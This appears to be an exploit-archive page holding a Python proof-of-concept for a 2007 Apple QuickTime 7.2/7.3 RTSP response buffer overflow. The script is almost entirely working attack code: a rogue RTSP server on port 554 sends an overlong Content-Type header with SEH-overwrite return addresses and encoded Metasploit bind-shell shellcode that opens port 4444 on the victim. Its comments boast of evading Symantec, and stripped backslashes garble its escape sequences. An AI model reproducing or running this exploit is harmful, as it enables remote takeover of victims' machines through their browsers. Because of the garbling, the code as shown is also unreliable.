Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)
# Published : 2007-11-26
# Author : muts
# Previous Title : Apple QuickTime 7.2/7.3 RSTP Response Universal Exploit (cool)
# Next Title : Apple QuickTime 7.2/7.3 RSTP Response Code Exec Exploit (Vista/XP)
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################  
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
# the attack appears to be prevented because standard buffer overflow  
# prevention processes act before any damage can be done, Florio wrote.  
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
# the exploit works against Firefox if QuickTime is the default multimedia player,  
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,  
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite  
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
 
from socket import *
 
header = (
'RTSP/1.0 200 OKrn'
'CSeq: 1rn'
'Date: 0x00 :Prn'
'Content-Base: rtsp://0.0.0.0/1.mp3/rn'
'Content-Type: %srn' # <-- overflow
'Content-Length: %drn'
'rn')
 
body = (
'v=0rn'
'o=- 16689332712 1 IN IP4 0.0.0.0rn'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'i=1.mp3rn'
't=0 0rn'
'a=tool:ciamciaramciarn'
'a=type:broadcastrn'
'a=control:*rn'
'a=range:npt=0-213.077rn'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'a=x-qt-text-inf:1.mp3rn'
'm=audio 0 RTP/AVP 14rn'
'c=IN IP4 0.0.0.0rn'
'a=control:track1rn'
)
 
# ExitProcess shellcode will kill browser, but keep the shell open
 
shellcode =(# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x37x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x50x30x42x31x41x42x6bx42x41x52x32x42x42x32x41"
"x41x30x41x41x58x42x50x38x42x42x75x39x79x4bx4cx61"
"x7ax38x6bx50x4dx68x68x69x69x4bx4fx4bx4fx59x6fx53"
"x50x4ex6bx32x4cx44x64x35x74x6ex6bx30x45x57x4cx4e"
"x6bx41x6cx64x45x51x68x46x61x4ax4fx6cx4bx30x4fx46"
"x78x6cx4bx71x4fx47x50x33x31x5ax4bx61x59x6ex6bx50"
"x34x4ex6bx46x61x78x6ex50x31x69x50x4ex79x4ex4cx4b"
"x34x6bx70x52x54x63x37x38x41x6ax6ax44x4dx63x31x6b"
"x72x68x6bx49x64x77x4bx30x54x41x34x45x78x52x55x69"
"x75x6ex6bx73x6fx75x74x56x61x7ax4bx33x56x4ex6bx36"
"x6cx72x6bx4cx4bx53x6fx35x4cx77x71x38x6bx47x73x44"
"x6cx6ex6bx4bx39x32x4cx35x74x77x6cx65x31x69x53x56"
"x51x49x4bx65x34x4ex6bx67x33x34x70x4cx4bx77x30x74"
"x4cx6ex6bx64x30x47x6cx4cx6dx6ex6bx41x50x63x38x53"
"x6ex70x68x4ex6ex62x6ex56x6ex38x6cx52x70x6bx4fx7a"
"x76x72x46x61x43x43x56x52x48x77x43x64x72x51x78x71"
"x67x50x73x70x32x71x4fx31x44x4bx4fx4ax70x75x38x78"
"x4bx68x6dx49x6cx75x6bx46x30x4bx4fx79x46x53x6fx6f"
"x79x38x65x73x56x4cx41x58x6dx64x48x65x52x72x75x32"
"x4ax73x32x49x6fx4ax70x33x58x78x59x63x39x39x65x4c"
"x6dx72x77x6bx4fx6ex36x50x53x52x73x51x43x70x53x33"
"x63x71x53x63x63x61x53x33x63x4bx4fx5ax70x73x56x51"
"x78x37x61x41x4cx50x66x53x63x6cx49x5ax41x5ax35x51"
"x78x4dx74x67x6ax30x70x4bx77x66x37x79x6fx4bx66x41"
"x7ax32x30x72x71x33x65x59x6fx38x50x70x68x6fx54x6e"
"x4dx64x6ex38x69x32x77x4bx4fx4ex36x51x43x41x45x39"
"x6fx4ax70x71x78x4ax45x71x59x6dx56x43x79x76x37x4b"
"x4fx39x46x52x70x72x74x46x34x31x45x4bx4fx68x50x4e"
"x73x43x58x6bx57x71x69x6fx36x53x49x76x37x6bx4fx38"
"x56x71x45x6bx4fx48x50x35x36x70x6ax31x74x45x36x31"
"x78x62x43x32x4dx6fx79x7ax45x71x7ax30x50x33x69x46"
"x49x6ax6cx6bx39x6ax47x73x5ax51x54x6fx79x6dx32x30"
"x31x59x50x38x73x4dx7ax59x6ex43x72x36x4dx69x6ex73"
"x72x54x6cx6fx63x4cx4dx72x5ax74x78x4cx6bx6cx6bx6e"
"x4bx35x38x50x72x6bx4ex4cx73x64x56x4bx4fx43x45x32"
"x64x79x6fx7ax76x33x6bx32x77x62x72x63x61x33x61x30"
"x51x30x6ax53x31x71x41x46x31x52x75x32x71x6bx4fx4e"
"x30x70x68x4ex4dx7ax79x46x65x4ax6ex72x73x69x6fx58"
"x56x72x4ax69x6fx69x6fx66x57x39x6fx58x50x4cx4bx41"
"x47x6bx4cx6cx43x4fx34x32x44x4bx4fx68x56x76x32x4b"
"x4fx4ex30x71x78x33x4ex6ax78x49x72x43x43x61x43x4b"
"x4fx48x56x69x6fx6ax70x42")
 
tmp = "A" * 987
tmp +="xebx20x90x90"  # short jump for 7.2
tmp +="xebx20x9cx66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="x4ex28x86x66"  # 6686284e | pop pop ret for 7.3
tmp += "x90" * 92
tmp += shellcode
tmp += "x41" * int(30000-len(shellcode))    # play with this buffer if you still get exceptions.  
 
header %= (tmp, len(body))
evil = header + body
 
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# www.Syue.com [2007-11-26]